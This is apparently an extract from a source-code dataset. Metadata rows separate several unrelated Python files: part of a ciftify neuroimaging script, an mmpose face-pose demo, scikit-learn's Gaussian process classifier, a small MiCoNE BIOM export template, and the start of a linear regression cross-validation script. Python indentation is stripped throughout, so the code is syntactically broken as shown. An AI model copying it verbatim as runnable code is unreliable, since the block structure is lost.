tmp_parcelated, settings.outputcsv,'-col-delim ","'])
if settings.outputlabels:
temp_wb_labels = os.path.join(tempdir, 'wb_labels.txt')
ciftify.utils.run(['wb_command', '-cifti-label-export-table',
settings.seed.path, '1',
temp_wb_labels])
ciftify.io.wb_labels_to_csv(temp_wb_labels, csv_out= settings.outputlabels)
class UserSettings(MeantsSettings):
def __init__(self, arguments):
MeantsSettings.__init__(self, arguments)
self.outputcsv = self.get_outputcsv(arguments['--outputcsv'])
self.outputlabels = self.get_outputlabels(arguments['--outputlabels'])
def check_output_path(self, path):
''' use ciftify function to ensure output is writable'''
ciftify.utils.check_output_writable(path)
return(path)
def get_outputcsv(self, outputcsv):
'''
determine func and seed filetypes
if outputcsv path doesn't exist, make one out of the func and seed names
'''
if not outputcsv:
outputdir = os.path.dirname(self.func.path)
outputcsv = os.path.join(outputdir,self.func.base + '_' + self.seed.base + '_meants.csv' )
outputcsv = self.check_output_path(outputcsv)
return(outputcsv)
def get_outputlabels(self,outputlabels):
'''if outputlabels where specified, check that they are writable '''
if outputlabels:
self.check_output_path(outputlabels)
return(outputlabels)
def main():
arguments = docopt(__doc__)
debug = arguments['--debug']
verbose = arguments['--verbose']
ch = logging.StreamHandler()
ch.setLevel(logging.WARNING)
if verbose:
ch.setLevel(logging.INFO)
if debug:
ch.setLevel(logging.DEBUG)
logger.addHandler(ch)
## set up the top of the log
logger.info('{}{}'.format(ciftify.utils.ciftify_logo(),
ciftify.utils.section_header('Starting ciftify_meants')))
ciftify.utils.log_arguments(arguments)
settings = UserSettings(arguments)
ret = run_ciftify_meants(settings)
logger.info(ciftify.utils.section_header('Done ciftify_meants'))
sys.exit(ret)
if __name__ == '__main__':
main()
| 36.403509 | 110 | 0.675823 |
981c68d18cfcc3f32b5687822cdb7f1db3df0edb | 3,505 | py | Python | demo/face_img_demo.py | ssumin6/buob | 4fb4537423a993cd2894f54cb12f5f3b3fb73141 | [
"Apache-2.0"
] | 367 | 2022-01-14T03:32:25.000Z | 2022-03-31T04:48:20.000Z | demo/face_img_demo.py | ssumin6/buob | 4fb4537423a993cd2894f54cb12f5f3b3fb73141 | [
"Apache-2.0"
] | 27 | 2022-01-27T07:12:49.000Z | 2022-03-31T04:31:13.000Z | demo/face_img_demo.py | ssumin6/buob | 4fb4537423a993cd2894f54cb12f5f3b3fb73141 | [
"Apache-2.0"
] | 53 | 2022-01-18T11:21:43.000Z | 2022-03-31T06:42:41.000Z | import os
from argparse import ArgumentParser
from mmpose.apis import (inference_top_down_pose_model, init_pose_model,
vis_pose_result)
try:
import face_recognition
has_face_det = True
except (ImportError, ModuleNotFoundError):
has_face_det = False
def process_face_det_results(face_det_results):
"""Process det results, and return a list of bboxes.
:param face_det_results: (top, right, bottom and left)
:return: a list of detected bounding boxes (x,y,x,y)-format
"""
person_results = []
for bbox in face_det_results:
person = {}
# left, top, right, bottom
person['bbox'] = [bbox[3], bbox[0], bbox[1], bbox[2]]
person_results.append(person)
return person_results
def main():
"""Visualize the demo images.
Using mmdet to detect the human.
"""
parser = ArgumentParser()
parser.add_argument('pose_config', help='Config file for pose')
parser.add_argument('pose_checkpoint', help='Checkpoint file for pose')
parser.add_argument('--img-root', type=str, default='', help='Image root')
parser.add_argument('--img', type=str, default='', help='Image file')
parser.add_argument(
'--show',
action='store_true',
default=False,
help='whether to show img')
parser.add_argument(
'--out-img-root',
type=str,
default='',
help='root of the output img file. '
'Default not saving the visualization images.')
parser.add_argument(
'--device', default='cuda:0', help='Device used for inference')
parser.add_argument(
'--kpt-thr', type=float, default=0.3, help='Keypoint score threshold')
assert has_face_det, 'Please install face_recognition to run the demo. ' \
'"pip install face_recognition", For more details, ' \
'see https://github.com/ageitgey/face_recognition'
args = parser.parse_args()
assert args.show or (args.out_img_root != '')
assert args.img != ''
# build the pose model from a config file and a checkpoint file
pose_model = init_pose_model(
args.pose_config, args.pose_checkpoint, device=args.device.lower())
dataset = pose_model.cfg.data['test']['type']
image_name = os.path.join(args.img_root, args.img)
# test a single image, the resulting box is (top, right, bottom and left)
image = face_recognition.load_image_file(image_name)
face_det_results = face_recognition.face_locations(image)
# keep the person class bounding boxes.
face_results = process_face_det_results(face_det_results)
# optional
return_heatmap = False
# e.g. use ('backbone', ) to return backbone feature
output_layer_names = None
pose_results, returned_outputs = inference_top_down_pose_model(
pose_model,
image_name,
face_results,
bbox_thr=None,
format='xyxy',
dataset=dataset,
return_heatmap=return_heatmap,
outputs=output_layer_names)
if args.out_img_root == '':
out_file = None
else:
os.makedirs(args.out_img_root, exist_ok=True)
out_file = os.path.join(args.out_img_root, f'vis_{args.img}')
# show the results
vis_pose_result(
pose_model,
image_name,
pose_results,
dataset=dataset,
kpt_score_thr=args.kpt_thr,
show=args.show,
out_file=out_file)
if __name__ == '__main__':
main()
| 30.215517 | 79 | 0.650214 |
072cf80dba250eb8e6807e736868104e759ce0a0 | 33,276 | py | Python | site-packages/sklearn/gaussian_process/_gpc.py | linusg/Pyto | eab3c3e093a8cace53d5b9425d1af2f535d456ee | [
"MIT"
] | 2 | 2020-08-25T13:55:00.000Z | 2020-08-25T16:36:03.000Z | site-packages/sklearn/gaussian_process/_gpc.py | linusg/Pyto | eab3c3e093a8cace53d5b9425d1af2f535d456ee | [
"MIT"
] | 1 | 2020-04-25T20:36:07.000Z | 2020-04-25T20:36:07.000Z | site-packages/sklearn/gaussian_process/_gpc.py | Wristlebane/Pyto | 901ac307b68486d8289105c159ca702318bea5b0 | [
"MIT"
] | null | null | null | """Gaussian processes classification."""
# Authors: Jan Hendrik Metzen <jhm@informatik.uni-bremen.de>
#
# License: BSD 3 clause
from operator import itemgetter
import numpy as np
from scipy.linalg import cholesky, cho_solve, solve
import scipy.optimize
from scipy.special import erf, expit
from ..base import BaseEstimator, ClassifierMixin, clone
from .kernels \
import RBF, CompoundKernel, ConstantKernel as C
from ..utils.validation import check_X_y, check_is_fitted, check_array
from ..utils import check_random_state
from ..utils.optimize import _check_optimize_result
from ..preprocessing import LabelEncoder
from ..multiclass import OneVsRestClassifier, OneVsOneClassifier
# Values required for approximating the logistic sigmoid by
# error functions. coefs are obtained via:
# x = np.array([0, 0.6, 2, 3.5, 4.5, np.inf])
# b = logistic(x)
# A = (erf(np.dot(x, self.lambdas)) + 1) / 2
# coefs = lstsq(A, b)[0]
LAMBDAS = np.array([0.41, 0.4, 0.37, 0.44, 0.39])[:, np.newaxis]
COEFS = np.array([-1854.8214151, 3516.89893646, 221.29346712,
128.12323805, -2010.49422654])[:, np.newaxis]
class _BinaryGaussianProcessClassifierLaplace(BaseEstimator):
"""Binary Gaussian process classification based on Laplace approximation.
The implementation is based on Algorithm 3.1, 3.2, and 5.1 of
``Gaussian Processes for Machine Learning'' (GPML) by Rasmussen and
Williams.
Internally, the Laplace approximation is used for approximating the
non-Gaussian posterior by a Gaussian.
Currently, the implementation is restricted to using the logistic link
function.
.. versionadded:: 0.18
Parameters
----------
kernel : kernel object
The kernel specifying the covariance function of the GP. If None is
passed, the kernel "1.0 * RBF(1.0)" is used as default. Note that
the kernel's hyperparameters are optimized during fitting.
optimizer : string or callable, optional (default: "fmin_l_bfgs_b")
Can either be one of the internally supported optimizers for optimizing
the kernel's parameters, specified by a string, or an externally
defined optimizer passed as a callable. If a callable is passed, it
must have the signature::
def optimizer(obj_func, initial_theta, bounds):
# * 'obj_func' is the objective function to be maximized, which
# takes the hyperparameters theta as parameter and an
# optional flag eval_gradient, which determines if the
# gradient is returned additionally to the function value
# * 'initial_theta': the initial value for theta, which can be
# used by local optimizers
# * 'bounds': the bounds on the values of theta
....
# Returned are the best found hyperparameters theta and
# the corresponding value of the target function.
return theta_opt, func_min
Per default, the 'L-BFGS-B' algorithm from scipy.optimize.minimize
is used. If None is passed, the kernel's parameters are kept fixed.
Available internal optimizers are::
'fmin_l_bfgs_b'
n_restarts_optimizer: int, optional (default: 0)
The number of restarts of the optimizer for finding the kernel's
parameters which maximize the log-marginal likelihood. The first run
of the optimizer is performed from the kernel's initial parameters,
the remaining ones (if any) from thetas sampled log-uniform randomly
from the space of allowed theta-values. If greater than 0, all bounds
must be finite. Note that n_restarts_optimizer=0 implies that one
run is performed.
max_iter_predict: int, optional (default: 100)
The maximum number of iterations in Newton's method for approximating
the posterior during predict. Smaller values will reduce computation
time at the cost of worse results.
warm_start : bool, optional (default: False)
If warm-starts are enabled, the solution of the last Newton iteration
on the Laplace approximation of the posterior mode is used as
initialization for the next call of _posterior_mode(). This can speed
up convergence when _posterior_mode is called several times on similar
problems as in hyperparameter optimization. See :term:`the Glossary
<warm_start>`.
copy_X_train : bool, optional (default: True)
If True, a persistent copy of the training data is stored in the
object. Otherwise, just a reference to the training data is stored,
which might cause predictions to change if the data is modified
externally.
random_state : int, RandomState instance or None, optional (default: None)
The generator used to initialize the centers. If int, random_state is
the seed used by the random number generator; If RandomState instance,
random_state is the random number generator; If None, the random number
generator is the RandomState instance used by `np.random`.
Attributes
----------
X_train_ : array-like of shape (n_samples, n_features)
Feature values in training data (also required for prediction)
y_train_ : array-like of shape (n_samples,)
Target values in training data (also required for prediction)
classes_ : array-like of shape (n_classes,)
Unique class labels.
kernel_ : kernel object
The kernel used for prediction. The structure of the kernel is the
same as the one passed as parameter but with optimized hyperparameters
L_ : array-like of shape (n_samples, n_samples)
Lower-triangular Cholesky decomposition of the kernel in X_train_
pi_ : array-like of shape (n_samples,)
The probabilities of the positive class for the training points
X_train_
W_sr_ : array-like of shape (n_samples,)
Square root of W, the Hessian of log-likelihood of the latent function
values for the observed labels. Since W is diagonal, only the diagonal
of sqrt(W) is stored.
log_marginal_likelihood_value_ : float
The log-marginal-likelihood of ``self.kernel_.theta``
"""
def __init__(self, kernel=None, optimizer="fmin_l_bfgs_b",
n_restarts_optimizer=0, max_iter_predict=100,
warm_start=False, copy_X_train=True, random_state=None):
self.kernel = kernel
self.optimizer = optimizer
self.n_restarts_optimizer = n_restarts_optimizer
self.max_iter_predict = max_iter_predict
self.warm_start = warm_start
self.copy_X_train = copy_X_train
self.random_state = random_state
def fit(self, X, y):
"""Fit Gaussian process classification model
Parameters
----------
X : array-like of shape (n_samples, n_features)
Training data
y : array-like of shape (n_samples,)
Target values, must be binary
Returns
-------
self : returns an instance of self.
"""
if self.kernel is None: # Use an RBF kernel as default
self.kernel_ = C(1.0, constant_value_bounds="fixed") \
* RBF(1.0, length_scale_bounds="fixed")
else:
self.kernel_ = clone(self.kernel)
self.rng = check_random_state(self.random_state)
self.X_train_ = np.copy(X) if self.copy_X_train else X
# Encode class labels and check that it is a binary classification
# problem
label_encoder = LabelEncoder()
self.y_train_ = label_encoder.fit_transform(y)
self.classes_ = label_encoder.classes_
if self.classes_.size > 2:
raise ValueError("%s supports only binary classification. "
"y contains classes %s"
% (self.__class__.__name__, self.classes_))
elif self.classes_.size == 1:
raise ValueError("{0:s} requires 2 classes; got {1:d} class"
.format(self.__class__.__name__,
self.classes_.size))
if self.optimizer is not None and self.kernel_.n_dims > 0:
# Choose hyperparameters based on maximizing the log-marginal
# likelihood (potentially starting from several initial values)
def obj_func(theta, eval_gradient=True):
if eval_gradient:
lml, grad = self.log_marginal_likelihood(
theta, eval_gradient=True, clone_kernel=False)
return -lml, -grad
else:
return -self.log_marginal_likelihood(theta,
clone_kernel=False)
# First optimize starting from theta specified in kernel
optima = [self._constrained_optimization(obj_func,
self.kernel_.theta,
self.kernel_.bounds)]
# Additional runs are performed from log-uniform chosen initial
# theta
if self.n_restarts_optimizer > 0:
if not np.isfinite(self.kernel_.bounds).all():
raise ValueError(
"Multiple optimizer restarts (n_restarts_optimizer>0) "
"requires that all bounds are finite.")
bounds = self.kernel_.bounds
for iteration in range(self.n_restarts_optimizer):
theta_initial = np.exp(self.rng.uniform(bounds[:, 0],
bounds[:, 1]))
optima.append(
self._constrained_optimization(obj_func, theta_initial,
bounds))
# Select result from run with minimal (negative) log-marginal
# likelihood
lml_values = list(map(itemgetter(1), optima))
self.kernel_.theta = optima[np.argmin(lml_values)][0]
self.log_marginal_likelihood_value_ = -np.min(lml_values)
else:
self.log_marginal_likelihood_value_ = \
self.log_marginal_likelihood(self.kernel_.theta)
# Precompute quantities required for predictions which are independent
# of actual query points
K = self.kernel_(self.X_train_)
_, (self.pi_, self.W_sr_, self.L_, _, _) = \
self._posterior_mode(K, return_temporaries=True)
return self
def predict(self, X):
"""Perform classification on an array of test vectors X.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Returns
-------
C : ndarray of shape (n_samples,)
Predicted target values for X, values are from ``classes_``
"""
check_is_fitted(self)
# As discussed on Section 3.4.2 of GPML, for making hard binary
# decisions, it is enough to compute the MAP of the posterior and
# pass it through the link function
K_star = self.kernel_(self.X_train_, X) # K_star =k(x_star)
f_star = K_star.T.dot(self.y_train_ - self.pi_) # Algorithm 3.2,Line 4
return np.where(f_star > 0, self.classes_[1], self.classes_[0])
def predict_proba(self, X):
"""Return probability estimates for the test vector X.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Returns
-------
C : array-like of shape (n_samples, n_classes)
Returns the probability of the samples for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute ``classes_``.
"""
check_is_fitted(self)
# Based on Algorithm 3.2 of GPML
K_star = self.kernel_(self.X_train_, X) # K_star =k(x_star)
f_star = K_star.T.dot(self.y_train_ - self.pi_) # Line 4
v = solve(self.L_, self.W_sr_[:, np.newaxis] * K_star) # Line 5
# Line 6 (compute np.diag(v.T.dot(v)) via einsum)
var_f_star = self.kernel_.diag(X) - np.einsum("ij,ij->j", v, v)
# Line 7:
# Approximate \int log(z) * N(z | f_star, var_f_star)
# Approximation is due to Williams & Barber, "Bayesian Classification
# with Gaussian Processes", Appendix A: Approximate the logistic
# sigmoid by a linear combination of 5 error functions.
# For information on how this integral can be computed see
# blitiri.blogspot.de/2012/11/gaussian-integral-of-error-function.html
alpha = 1 / (2 * var_f_star)
gamma = LAMBDAS * f_star
integrals = np.sqrt(np.pi / alpha) \
* erf(gamma * np.sqrt(alpha / (alpha + LAMBDAS**2))) \
/ (2 * np.sqrt(var_f_star * 2 * np.pi))
pi_star = (COEFS * integrals).sum(axis=0) + .5 * COEFS.sum()
return np.vstack((1 - pi_star, pi_star)).T
def log_marginal_likelihood(self, theta=None, eval_gradient=False,
clone_kernel=True):
"""Returns log-marginal likelihood of theta for training data.
Parameters
----------
theta : array-like of shape (n_kernel_params,) or None
Kernel hyperparameters for which the log-marginal likelihood is
evaluated. If None, the precomputed log_marginal_likelihood
of ``self.kernel_.theta`` is returned.
eval_gradient : bool, default: False
If True, the gradient of the log-marginal likelihood with respect
to the kernel hyperparameters at position theta is returned
additionally. If True, theta must not be None.
clone_kernel : bool, default=True
If True, the kernel attribute is copied. If False, the kernel
attribute is modified, but may result in a performance improvement.
Returns
-------
log_likelihood : float
Log-marginal likelihood of theta for training data.
log_likelihood_gradient : array, shape = (n_kernel_params,), optional
Gradient of the log-marginal likelihood with respect to the kernel
hyperparameters at position theta.
Only returned when eval_gradient is True.
"""
if theta is None:
if eval_gradient:
raise ValueError(
"Gradient can only be evaluated for theta!=None")
return self.log_marginal_likelihood_value_
if clone_kernel:
kernel = self.kernel_.clone_with_theta(theta)
else:
kernel = self.kernel_
kernel.theta = theta
if eval_gradient:
K, K_gradient = kernel(self.X_train_, eval_gradient=True)
else:
K = kernel(self.X_train_)
# Compute log-marginal-likelihood Z and also store some temporaries
# which can be reused for computing Z's gradient
Z, (pi, W_sr, L, b, a) = \
self._posterior_mode(K, return_temporaries=True)
if not eval_gradient:
return Z
# Compute gradient based on Algorithm 5.1 of GPML
d_Z = np.empty(theta.shape[0])
# XXX: Get rid of the np.diag() in the next line
R = W_sr[:, np.newaxis] * cho_solve((L, True), np.diag(W_sr)) # Line 7
C = solve(L, W_sr[:, np.newaxis] * K) # Line 8
# Line 9: (use einsum to compute np.diag(C.T.dot(C))))
s_2 = -0.5 * (np.diag(K) - np.einsum('ij, ij -> j', C, C)) \
* (pi * (1 - pi) * (1 - 2 * pi)) # third derivative
for j in range(d_Z.shape[0]):
C = K_gradient[:, :, j] # Line 11
# Line 12: (R.T.ravel().dot(C.ravel()) = np.trace(R.dot(C)))
s_1 = .5 * a.T.dot(C).dot(a) - .5 * R.T.ravel().dot(C.ravel())
b = C.dot(self.y_train_ - pi) # Line 13
s_3 = b - K.dot(R.dot(b)) # Line 14
d_Z[j] = s_1 + s_2.T.dot(s_3) # Line 15
return Z, d_Z
def _posterior_mode(self, K, return_temporaries=False):
"""Mode-finding for binary Laplace GPC and fixed kernel.
This approximates the posterior of the latent function values for given
inputs and target observations with a Gaussian approximation and uses
Newton's iteration to find the mode of this approximation.
"""
# Based on Algorithm 3.1 of GPML
# If warm_start are enabled, we reuse the last solution for the
# posterior mode as initialization; otherwise, we initialize with 0
if self.warm_start and hasattr(self, "f_cached") \
and self.f_cached.shape == self.y_train_.shape:
f = self.f_cached
else:
f = np.zeros_like(self.y_train_, dtype=np.float64)
# Use Newton's iteration method to find mode of Laplace approximation
log_marginal_likelihood = -np.inf
for _ in range(self.max_iter_predict):
# Line 4
pi = expit(f)
W = pi * (1 - pi)
# Line 5
W_sr = np.sqrt(W)
W_sr_K = W_sr[:, np.newaxis] * K
B = np.eye(W.shape[0]) + W_sr_K * W_sr
L = cholesky(B, lower=True)
# Line 6
b = W * f + (self.y_train_ - pi)
# Line 7
a = b - W_sr * cho_solve((L, True), W_sr_K.dot(b))
# Line 8
f = K.dot(a)
# Line 10: Compute log marginal likelihood in loop and use as
# convergence criterion
lml = -0.5 * a.T.dot(f) \
- np.log1p(np.exp(-(self.y_train_ * 2 - 1) * f)).sum() \
- np.log(np.diag(L)).sum()
# Check if we have converged (log marginal likelihood does
# not decrease)
# XXX: more complex convergence criterion
if lml - log_marginal_likelihood < 1e-10:
break
log_marginal_likelihood = lml
self.f_cached = f # Remember solution for later warm-starts
if return_temporaries:
return log_marginal_likelihood, (pi, W_sr, L, b, a)
else:
return log_marginal_likelihood
def _constrained_optimization(self, obj_func, initial_theta, bounds):
if self.optimizer == "fmin_l_bfgs_b":
opt_res = scipy.optimize.minimize(
obj_func, initial_theta, method="L-BFGS-B", jac=True,
bounds=bounds)
_check_optimize_result("lbfgs", opt_res)
theta_opt, func_min = opt_res.x, opt_res.fun
elif callable(self.optimizer):
theta_opt, func_min = \
self.optimizer(obj_func, initial_theta, bounds=bounds)
else:
raise ValueError("Unknown optimizer %s." % self.optimizer)
return theta_opt, func_min
class GaussianProcessClassifier(ClassifierMixin, BaseEstimator):
"""Gaussian process classification (GPC) based on Laplace approximation.
The implementation is based on Algorithm 3.1, 3.2, and 5.1 of
Gaussian Processes for Machine Learning (GPML) by Rasmussen and
Williams.
Internally, the Laplace approximation is used for approximating the
non-Gaussian posterior by a Gaussian.
Currently, the implementation is restricted to using the logistic link
function. For multi-class classification, several binary one-versus rest
classifiers are fitted. Note that this class thus does not implement
a true multi-class Laplace approximation.
Parameters
----------
kernel : kernel object
The kernel specifying the covariance function of the GP. If None is
passed, the kernel "1.0 * RBF(1.0)" is used as default. Note that
the kernel's hyperparameters are optimized during fitting.
optimizer : string or callable, optional (default: "fmin_l_bfgs_b")
Can either be one of the internally supported optimizers for optimizing
the kernel's parameters, specified by a string, or an externally
defined optimizer passed as a callable. If a callable is passed, it
must have the signature::
def optimizer(obj_func, initial_theta, bounds):
# * 'obj_func' is the objective function to be maximized, which
# takes the hyperparameters theta as parameter and an
# optional flag eval_gradient, which determines if the
# gradient is returned additionally to the function value
# * 'initial_theta': the initial value for theta, which can be
# used by local optimizers
# * 'bounds': the bounds on the values of theta
....
# Returned are the best found hyperparameters theta and
# the corresponding value of the target function.
return theta_opt, func_min
Per default, the 'L-BFGS-B' algorithm from scipy.optimize.minimize
is used. If None is passed, the kernel's parameters are kept fixed.
Available internal optimizers are::
'fmin_l_bfgs_b'
n_restarts_optimizer : int, optional (default: 0)
The number of restarts of the optimizer for finding the kernel's
parameters which maximize the log-marginal likelihood. The first run
of the optimizer is performed from the kernel's initial parameters,
the remaining ones (if any) from thetas sampled log-uniform randomly
from the space of allowed theta-values. If greater than 0, all bounds
must be finite. Note that n_restarts_optimizer=0 implies that one
run is performed.
max_iter_predict : int, optional (default: 100)
The maximum number of iterations in Newton's method for approximating
the posterior during predict. Smaller values will reduce computation
time at the cost of worse results.
warm_start : bool, optional (default: False)
If warm-starts are enabled, the solution of the last Newton iteration
on the Laplace approximation of the posterior mode is used as
initialization for the next call of _posterior_mode(). This can speed
up convergence when _posterior_mode is called several times on similar
problems as in hyperparameter optimization. See :term:`the Glossary
<warm_start>`.
copy_X_train : bool, optional (default: True)
If True, a persistent copy of the training data is stored in the
object. Otherwise, just a reference to the training data is stored,
which might cause predictions to change if the data is modified
externally.
random_state : int, RandomState instance or None, optional (default: None)
The generator used to initialize the centers.
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
multi_class : string, default : "one_vs_rest"
Specifies how multi-class classification problems are handled.
Supported are "one_vs_rest" and "one_vs_one". In "one_vs_rest",
one binary Gaussian process classifier is fitted for each class, which
is trained to separate this class from the rest. In "one_vs_one", one
binary Gaussian process classifier is fitted for each pair of classes,
which is trained to separate these two classes. The predictions of
these binary predictors are combined into multi-class predictions.
Note that "one_vs_one" does not support predicting probability
estimates.
n_jobs : int or None, optional (default=None)
The number of jobs to use for the computation.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Attributes
----------
kernel_ : kernel object
The kernel used for prediction. In case of binary classification,
the structure of the kernel is the same as the one passed as parameter
but with optimized hyperparameters. In case of multi-class
classification, a CompoundKernel is returned which consists of the
different kernels used in the one-versus-rest classifiers.
log_marginal_likelihood_value_ : float
The log-marginal-likelihood of ``self.kernel_.theta``
classes_ : array-like of shape (n_classes,)
Unique class labels.
n_classes_ : int
The number of classes in the training data
Examples
--------
>>> from sklearn.datasets import load_iris
>>> from sklearn.gaussian_process import GaussianProcessClassifier
>>> from sklearn.gaussian_process.kernels import RBF
>>> X, y = load_iris(return_X_y=True)
>>> kernel = 1.0 * RBF(1.0)
>>> gpc = GaussianProcessClassifier(kernel=kernel,
... random_state=0).fit(X, y)
>>> gpc.score(X, y)
0.9866...
>>> gpc.predict_proba(X[:2,:])
array([[0.83548752, 0.03228706, 0.13222543],
[0.79064206, 0.06525643, 0.14410151]])
.. versionadded:: 0.18
"""
def __init__(self, kernel=None, optimizer="fmin_l_bfgs_b",
n_restarts_optimizer=0, max_iter_predict=100,
warm_start=False, copy_X_train=True, random_state=None,
multi_class="one_vs_rest", n_jobs=None):
self.kernel = kernel
self.optimizer = optimizer
self.n_restarts_optimizer = n_restarts_optimizer
self.max_iter_predict = max_iter_predict
self.warm_start = warm_start
self.copy_X_train = copy_X_train
self.random_state = random_state
self.multi_class = multi_class
self.n_jobs = n_jobs
def fit(self, X, y):
"""Fit Gaussian process classification model
Parameters
----------
X : array-like of shape (n_samples, n_features)
Training data
y : array-like of shape (n_samples,)
Target values, must be binary
Returns
-------
self : returns an instance of self.
"""
X, y = check_X_y(X, y, multi_output=False)
self.base_estimator_ = _BinaryGaussianProcessClassifierLaplace(
self.kernel, self.optimizer, self.n_restarts_optimizer,
self.max_iter_predict, self.warm_start, self.copy_X_train,
self.random_state)
self.classes_ = np.unique(y)
self.n_classes_ = self.classes_.size
if self.n_classes_ == 1:
raise ValueError("GaussianProcessClassifier requires 2 or more "
"distinct classes; got %d class (only class %s "
"is present)"
% (self.n_classes_, self.classes_[0]))
if self.n_classes_ > 2:
if self.multi_class == "one_vs_rest":
self.base_estimator_ = \
OneVsRestClassifier(self.base_estimator_,
n_jobs=self.n_jobs)
elif self.multi_class == "one_vs_one":
self.base_estimator_ = \
OneVsOneClassifier(self.base_estimator_,
n_jobs=self.n_jobs)
else:
raise ValueError("Unknown multi-class mode %s"
% self.multi_class)
self.base_estimator_.fit(X, y)
if self.n_classes_ > 2:
self.log_marginal_likelihood_value_ = np.mean(
[estimator.log_marginal_likelihood()
for estimator in self.base_estimator_.estimators_])
else:
self.log_marginal_likelihood_value_ = \
self.base_estimator_.log_marginal_likelihood()
return self
def predict(self, X):
"""Perform classification on an array of test vectors X.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Returns
-------
C : ndarray of shape (n_samples,)
Predicted target values for X, values are from ``classes_``
"""
check_is_fitted(self)
X = check_array(X)
return self.base_estimator_.predict(X)
def predict_proba(self, X):
"""Return probability estimates for the test vector X.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Returns
-------
C : array-like of shape (n_samples, n_classes)
Returns the probability of the samples for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute :term:`classes_`.
"""
check_is_fitted(self)
if self.n_classes_ > 2 and self.multi_class == "one_vs_one":
raise ValueError("one_vs_one multi-class mode does not support "
"predicting probability estimates. Use "
"one_vs_rest mode instead.")
X = check_array(X)
return self.base_estimator_.predict_proba(X)
@property
def kernel_(self):
if self.n_classes_ == 2:
return self.base_estimator_.kernel_
else:
return CompoundKernel(
[estimator.kernel_
for estimator in self.base_estimator_.estimators_])
def log_marginal_likelihood(self, theta=None, eval_gradient=False,
clone_kernel=True):
"""Returns log-marginal likelihood of theta for training data.
In the case of multi-class classification, the mean log-marginal
likelihood of the one-versus-rest classifiers are returned.
Parameters
----------
theta : array-like of shape (n_kernel_params,) or None
Kernel hyperparameters for which the log-marginal likelihood is
evaluated. In the case of multi-class classification, theta may
be the hyperparameters of the compound kernel or of an individual
kernel. In the latter case, all individual kernel get assigned the
same theta values. If None, the precomputed log_marginal_likelihood
of ``self.kernel_.theta`` is returned.
eval_gradient : bool, default: False
If True, the gradient of the log-marginal likelihood with respect
to the kernel hyperparameters at position theta is returned
additionally. Note that gradient computation is not supported
for non-binary classification. If True, theta must not be None.
clone_kernel : bool, default=True
If True, the kernel attribute is copied. If False, the kernel
attribute is modified, but may result in a performance improvement.
Returns
-------
log_likelihood : float
Log-marginal likelihood of theta for training data.
log_likelihood_gradient : array, shape = (n_kernel_params,), optional
Gradient of the log-marginal likelihood with respect to the kernel
hyperparameters at position theta.
Only returned when eval_gradient is True.
"""
check_is_fitted(self)
if theta is None:
if eval_gradient:
raise ValueError(
"Gradient can only be evaluated for theta!=None")
return self.log_marginal_likelihood_value_
theta = np.asarray(theta)
if self.n_classes_ == 2:
return self.base_estimator_.log_marginal_likelihood(
theta, eval_gradient, clone_kernel=clone_kernel)
else:
if eval_gradient:
raise NotImplementedError(
"Gradient of log-marginal-likelihood not implemented for "
"multi-class GPC.")
estimators = self.base_estimator_.estimators_
n_dims = estimators[0].kernel_.n_dims
if theta.shape[0] == n_dims: # use same theta for all sub-kernels
return np.mean(
[estimator.log_marginal_likelihood(
theta, clone_kernel=clone_kernel)
for i, estimator in enumerate(estimators)])
elif theta.shape[0] == n_dims * self.classes_.shape[0]:
# theta for compound kernel
return np.mean(
[estimator.log_marginal_likelihood(
theta[n_dims * i:n_dims * (i + 1)],
clone_kernel=clone_kernel)
for i, estimator in enumerate(estimators)])
else:
raise ValueError("Shape of theta must be either %d or %d. "
"Obtained theta with shape %d."
% (n_dims, n_dims * self.classes_.shape[0],
theta.shape[0]))
| 42.992248 | 79 | 0.617532 |
9fa5048233526e2d2c16a52a195f0721cc9bbea8 | 298 | py | Python | micone/pipelines/templates/otu_processing/export/biom2tsv.py | segrelab/MiCoNE | 91e0c5173293fc6584115036bba599097e4632da | [
"MIT"
] | 6 | 2020-09-23T20:07:13.000Z | 2021-04-20T22:10:07.000Z | micone/pipelines/templates/otu_processing/export/biom2tsv.py | segrelab/MiCoNE | 91e0c5173293fc6584115036bba599097e4632da | [
"MIT"
] | 36 | 2020-07-24T17:03:27.000Z | 2022-03-28T13:13:18.000Z | micone/pipelines/templates/otu_processing/export/biom2tsv.py | segrelab/MiCoNE | 91e0c5173293fc6584115036bba599097e4632da | [
"MIT"
] | 2 | 2020-06-07T23:17:39.000Z | 2021-03-28T15:04:19.000Z | #!/usr/bin/env python
from micone import Otu
def main(biom_file, base_name):
otu_biom = Otu.load_data(biom_file)
otu_biom.write(base_name=base_name, file_type="tsv")
if __name__ == "__main__":
BIOM_FILE = "${otu_file}"
BASE_NAME = "${tax_level}"
main(BIOM_FILE, BASE_NAME)
| 19.866667 | 56 | 0.691275 |
36dd41adef683dcf3b70cb3e1855492cb7786d09 | 762 | py | Python | spot_check_regression_algorithm_linear_regression.py | PacktPublishing/Machine-Learning-and-Data-Science-with-Python-A-Complete-Beginners-Guide | 1ffe8bbbd1963e5bea4a37a79dd87aa0d54b298f | [
"MIT"
] | 9 | 2019-12-23T22:25:11.000Z | 2022-02-25T14:54:43.000Z | spot_check_regression_algorithm_linear_regression.py | PacktPublishing/Machine-Learning-and-Data-Science-with-Python-A-Complete-Beginners-Guide | 1ffe8bbbd1963e5bea4a37a79dd87aa0d54b298f | [
"MIT"
] | 1 | 2019-09-22T14:05:42.000Z | 2020-12-31T11:55:42.000Z | spot_check_regression_algorithm_linear_regression.py | PacktPublishing/Machine-Learning-and-Data-Science-with-Python-A-Complete-Beginners-Guide | 1ffe8bbbd1963e5bea4a37a79dd87aa0d54b298f | [
"MIT"
] | 9 | 2019-08-01T22:54:08.000Z | 2022-01-05T13:57:17.000Z | # -*- coding: utf-8 -*-
"""
@author: abhilash
"""
# Cross Validation Regression MAE
from pandas import read_csv
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.linear_model import LinearRegression
filename = 'BostonHousing.csv'
